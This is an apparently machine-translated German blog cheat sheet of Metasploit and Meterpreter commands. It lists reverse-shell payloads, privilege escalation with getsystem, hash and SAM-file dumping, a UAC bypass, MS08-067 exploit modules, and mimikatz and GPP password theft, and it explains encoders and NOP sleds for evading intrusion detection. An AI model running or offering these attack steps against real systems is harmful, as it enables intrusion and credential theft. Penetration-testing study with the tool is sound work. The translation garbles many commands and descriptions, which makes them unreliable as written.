Categories: Tutorials

Metasploit-Befehlsliste (2021)-Verwenden Sie Metasploit wie ein Profi!

Möchten Sie Metasploit Pro Framework oder Metasploit Unleashed verwenden? Nun, Sie müssen zuerst ihre Befehle kennen!. Im Folgenden teilen wir Ihnen die neueste Metasploit-Befehlsliste von 2021 mit. Dieses Spickzettel enthält alle Befehle, die Sie jemals benötigen werden, um voranzukommen!

In diesem Handbuch werden wir sehr grundlegende Informationen zum Spickzettel für Metasploit-Befehle erläutern die in der Befehlszeilenschnittstelle verwendet werden kann. Es gibt auch viele andere Befehlszeilen-Konsolen, die über das Internet verfügbar sind (z. B. MSFConsole-Befehlszeile ), die jedoch sehr schwer zu verwenden und zu verstehen sind.

Was ist Metasploit Framework?

Metasploit ist ein Produkt, mit dem in ein Remote-System eingebrochen werden kann und mit dem auch die Sicherheitsanfälligkeit eines Computersystems getestet werden kann. Wie alle anderen Informationssicherheitstools kann Metasploit auch für beide Zwecke verwendet werden (nicht autorisierte und legitime Aktivitäten). Der Rapid7 hat außerdem die beiden proprietären Editionen oder Versionen Metasploit Pro und Metasploit Express hinzugefügt. Sie können auch einige unserer Kali Linux Terminal-Befehle zum Hacken sehen.

Metasploit zeigt das Risiko und die Behebung bestimmter Fehler auf, die möglicherweise auf Ihrem Personal Computer (PC) verfügbar sind. Später wurde das Fuzzing-Tool auch in Metasploit 3.0 aufgenommen, mit dem die Schwachstellen von Software auch bei Exploits für die bekannten Fehler entdeckt wurden. Nach einiger Zeit wurde im November 2006 auch das Toolset Lorcon Wireless (802.11) zum Metasploit 3.0 hinzugefügt. Nach all diesen Updates veröffentlichte das Rapid7 im August 2011 das Metasploit 4.0.

Sie können Holen Sie sich Metasploit Pro Framework von der folgenden Seite:

Laden Sie Metasploit Pro Framework kostenlos herunter

Eine kurze Geschichte von Metasploit Framework

H. D. Moore war 2003 der Schöpfer dieses tragbaren Netzwerk-Tools namens Metasploit mit Perl. 2007 wurde das Metasploit Framework im Ruby komplett neu geschrieben. Am 21. Oktober 2009 gab der Metasploit bekannt, dass er von Rapid7 gekauft oder erworben wurde. Rapid7 ist ein Sicherheitsunternehmen, das viele Arten von einheitlichen Lösungen zum Verwalten von Sicherheitslücken anbietet.

Liste der neuesten Metasploit-Befehle 2021 (neu)

  • Meterpreter-Nutzdaten:
  • Windows-Reverse-Meterpreter-Nutzdaten
Befehl Beschreibung der CMD Payload-Fenster einstellen/meterpreter/reverse_tcp Windows-Reverse-TCP-Payload

Windows VNC-Nutzdaten für Meterpreter

Befehl Beschreibung der CMD
set payload windows/vncinject/reverse_tcpset ViewOnly false Meterpreter Windows VNC Payload

Nutzdaten des Linux Reverse Meterpreter

Befehl Beschreibung der CMD
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter-Spickzettelbefehle (2021 Neueste)

Befehl Beschreibung der CMD Datei hochladen c: \\\\ windows Meterpreter lädt Datei auf das Windows-Ziel hoch Maschine c: \\\\ Windows \\\\ Reparatur \\\\ sam/tmp

Meterpreter-Download-Datei vom Windows-Ziel

Download c: \\\\ Windows \\\\ Reparatur \\\\ sam/tmp Meterpreter lädt die Dateien vom Windows-Zielcomputer führe-fc: \\\\ windo aus ws\\temp\\Exploit.exe Meterpreter führt .exe auf dem Ziel aus-praktisch zum Ausführen hochgeladener Exploits -f cmd-c ausführen Erstellt einen neuen Kanal mit der cmd-Shell ps Meterpreter zeigt Ihnen die aktuellen Prozesse, die laufen Shell Meterpreter erhält der Shell-Zugriff auf dem Zielcomputer oder Server getsystem Meterpreter versucht, eine Eskalation von Berechtigungen durchzuführen, um Zugriff auf das Ziel Hashdump Meterpreter versucht, die Hashes auf dem Ziel abzulegen. portfwd add –L 3389 –p 3389 –r Ziel Meterpreter erstellt einen Port vorwärts zum Zielcomputer portfwd delete –l 3389 –p 3389 –r target Meterpreter löscht die Portweiterleitungsfunktion

Read: Top 9 Hacking-Befehle für Microsoft CMD-Eingabeaufforderungen 2021.

Allgemeine Metasploit-Module und Remote-Windows-Metasploit-Module

Befehl Beschreibung der CMD
Exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
Verwenden Sie Exploit/Windows/Dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
Exploit verwenden/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 und Server 2008 (x86) Remote Exploit

Lokale Windows-Metasploit-Module

Befehl Beschreibung der CMD
Verwenden Sie Exploit/Windows/Local/Bypassuac UAC unter Windows 7 umgehen + Ziel + Bogen festlegen, x86/64

Auxilary Metasploit Modules

Befehl Beschreibung der Verwendung von CMD
Auxiliary/Scanner/http/dir_scanner HTTP-Verzeichnisscanner von Metasploit
Auxiliary/Scanner/http/jboss_vulnscan verwenden Metasploit JBOSS-Schwachstellenscanner
Verwenden Sie auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
Verwenden Sie Auxiliary/Scanner/MySQL/MySQL_Version Metasploit MSSQL-Versionsscanner
Verwenden Sie auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Lesen Sie auch: Der perfekte Leitfaden für DDoS wie ein Pro-Hacker.

Metasploit Powershell-Module

Befehl Beschreibung von CMD
Verwenden Sie Exploit/Multi/Script/Web_Delivery Metasploit-Powershell-Nutzlast-Bereitstellungsmodul
post/windows/verwalten/Powershell/Exec_Powershell Metasploit hochladen und Powershell-Skript über eine Sitzung ausführen
Exploit/multi/http/jboss_maindeployer verwenden Metasploit JBOSS deploy
Exploit/windows/mssql/mssql_payload verwenden Metasploit MSSQL-Payload

Windows-Metasploit-Module nach dem Exploit

Befehl Beschreibung der CMD
post/windows/collect/win_privs ausführen Metasploit zeigt die Berechtigungen des aktuellen Benutzers
Verwenden Sie post/windows/collect/credentials/gpp Metasploit Grab GPP gespeicherte Passwörter
oad mimikatz-\u0026 gt; wdigest Metasplit-Last Mimikatz
run post/windows/collect/local_admin_search_enum Identifiziert andere Computer, auf die der angegebene Domänenbenutzer Administratorzugriff hat

Quelle: TheHackToday

Die grundlegenden Metasploit-Befehle, die Sie im Jahr 2021 kennen müssen

Der Metasploit-Befehl zum Aktualisieren von Framework:

passendes Update; apt install metasploit-framework

Der folgende Befehl enthält die neueste Version von Metasploit-Framework, das aktualisiert wird. Das Update besagt Folgendes, dass wir das wöchentliche Update der Kopie unseres Metasploit Framework aktualisieren sollten. Es gibt jedoch einen kleinen Nachteil dieses Befehls, und das Ausführen dieses Befehls kann die Kopie Ihrer auf Ihrem PC installierten Software beschädigen oder beschädigen.

Empfohlene Lektüre : Oben 8 Die besten Linux-Distributionen für Hacking-und Penetrationstests!

Metasploit-Befehle msfhelp/console:

Wenn Sie Metasploit zum ersten Mal ausführen, wird das folgende Fenster angezeigt wird auf Ihrem Bildschirm geöffnet. Wenn Sie nichts über Metasploit wissen oder keine Informationen dazu haben, können Sie einfach Folgendes eingeben: help, um alle Befehle und Informationen zu Metasploit anzuzeigen.

Ich werde Ihre Zeit nicht verschwenden Bei der Erläuterung aller Befehle in Metasploit werde ich jedoch einige der grundlegenden und am häufigsten verwendeten Befehle erläutern, die Sie am häufigsten verwenden werden.

  • Grundlegende Befehle: Diese Befehle werden zum Suchen, Verwenden verwendet , Zurück, Hilfe, Info und Beenden.
  • Exploit-Befehle: Mit diesen Befehlen werden Variablen festgelegt und die Exploit-Optionen und Ausweichoptionen, Nutzdaten und Encoder angezeigt.
  • Exploit-Ausführungsbefehle : Diese Befehle werden zum Ausführen und Ausführen von Exploits für ein bestimmtes Ziel verwendet.

Nützlichere Metasploit-Befehle:

  • Suchbefehl:

Dieser Befehl wird verwendet, um nach verschiedenen Arten oder Arten von Schwachstellen und Exploits aus dem zu suchen msfconsole.

  • Info-Befehl:

Mit diesem Befehl behalten Sie die Dokumentation im Auge und sehen sich den Eigentümer des Exploits an.

Lesen Sie: 8 beste Möglichkeiten zum Sichern Ihres Linux-Servers (Linux Hardening Guide 2021).

    • Befehl Optionen anzeigen :

    Mit Hilfe dieses einfachen Befehls können wir show-Befehle verwenden, um alle für die Nutzlast erforderlichen Werte anzuzeigen, mit denen der PC oder die Maschine des Opfers, die wir angreifen möchten, weiter angegriffen werden kann.

    • LHOST :

    Mit Hilfe dieses Befehls können Sie dies problemlos tun Wenn Sie das WAN-Netzwerk angreifen, müssen Sie nur den LHOST auf die statische IP-Adresse IP und alle anderen Forward-Ports einstellen.

    • LPORT :

    Wenn Sie versuchen, im LAN-Netzwerk zu arbeiten, müssen Sie den Port nicht weiterleiten, sondern können jeden beliebigen Port verwenden, den Sie verwenden möchten. Wenn Sie jedoch das WAN-Netzwerk angreifen, müssen Sie den Port, den Sie angreifen möchten, weiterleiten.

    • Payloads anzeigen :

    Mit Hilfe dieses Befehls verwenden wir den Befehl show payloads. Dieser Befehl gibt eine ganze Liste kompatibler Nutzdaten für den folgenden Exploit zurück. In der folgenden Abbildung hat Metasploit viele kompatible Nutzdaten geladen:

    • Ziele anzeigen:

    Dieser Befehl gibt eine ganze Liste zurück von Betriebssystemen, die für den ausgewählten oder ausgewählten Exploit sehr anfällig sind. Nach dem Ausführen dieses Befehls erhalten wir die folgende Ausgabe des folgenden Exploits:

    Adobe_flash_shader_drawing_fill-Exploit.

    • Show Advanced:

    Mit diesem Befehl show advanced können wir alle erweiterten Optionen für die erforderlichen Exploits anzeigen.

    Download: Nessus Professional Vulnerability Scanner-Software.

    • Encoder anzeigen:

    Mit diesem Befehl werden alle zurückgegeben kompatible Encoder. Diese Encoder werden verwendet, um die einfachen IDS/IPS-Signaturen zu umgehen, die nach bestimmten Bytes der verfügbaren Nutzlast durchsucht wurden.

    • Nops anzeigen:

    Dieser Befehl gibt eine ganze Liste der NOP-Generatoren zurück. NOP ist die Abkürzung für No Operation und wird verwendet, um das Muster zu ändern, um einfache IDS/IPS gängiger NOP-Schlitten zu umgehen. Diese NOP-Generatoren beginnen mit einer vollständigen Konfiguration der CPU-Architektur im Namen.

    Download: Acunetix Web Vulnerability Scanner Kostenlos.

    Sie können den offiziellen Offensive Security Site für die vollständigen AZ Metasploit-Befehle.

    Kennen Sie weitere Metasploit-Befehle, die wir dieser Liste hinzufügen können?

    In diesem Artikel haben wir die Liste der Metasploit-Befehle im Jahr 2021 besprochen. Wir haben auch über viele verschiedene Befehle gesprochen, mit denen Sie verschiedene Aufgaben und all die verschiedenen Funktionen ausführen können. Es ist eine absolut sichere Methode, um die anfällige Überprüfung zu verwenden und durchzuführen und all diese damit verbundenen Probleme zu lösen.

    Ich hoffe, dieser Leitfaden wird Ihnen wirklich hilfreich sein. Teilen Sie es mit Ihren Freunden und Ihrer Familie, um ihnen bei der Lösung ihrer Probleme zu helfen. Wenn Sie Fragen haben, lassen Sie diese im Kommentarbereich. Wir sind immer für Sie da, wenn Sie Hilfe benötigen.

adminguides

Share
Published by
adminguides

Recent Posts

Kombinieren Sie das Haftnotizen-Symbol in der Taskleiste, nicht kombiniertes Problem

Die Microsoft Sticky Notes sind ein beliebtes und nützliches Tool für Benutzer von Windows 10-Systemen,…

2 Jahren ago

Windows 11-Insider-Kanäle können nicht von Dev auf Beta geändert werden

Microsoft hat kürzlich den lang erwarteten Windows 11 Dev Channel veröffentlicht, auf den über Windows…

2 Jahren ago

Beheben Sie den Anwendungsfehler „DDE Server Window Explorer.exe“.

Windows 10 ist eines der beliebtesten und am weitesten verbreiteten Betriebssysteme für Computerbenutzer.Die Entwicklung von…

2 Jahren ago

Herunterladen der Microsoft Edge-Download-Schaltfläche funktioniert nicht

Überprüfen und konfigurieren Sie die BerechtigungseinstellungenAktivieren Sie Edge für die Ausführung mit AdministratorrechtenReparieren Sie Microsoft…

2 Jahren ago

Laden Sie den Treiber für den Insignia USB 2.0-zu-Ethernet-Adapter für Windows 11, 10 herunter

Die meisten der neuesten Laptops haben keinen eingebauten Ethernet-Anschluss.Wir alle wissen, dass kabelgebundene Verbindungen viel…

2 Jahren ago

Asus Zephyrus verwendet keine GPU, wie man es behebt

Die Grafikverarbeitungseinheit oder GPU ist eine wesentliche Komponente eines Computersystems, die für die Wiedergabe von…

2 Jahren ago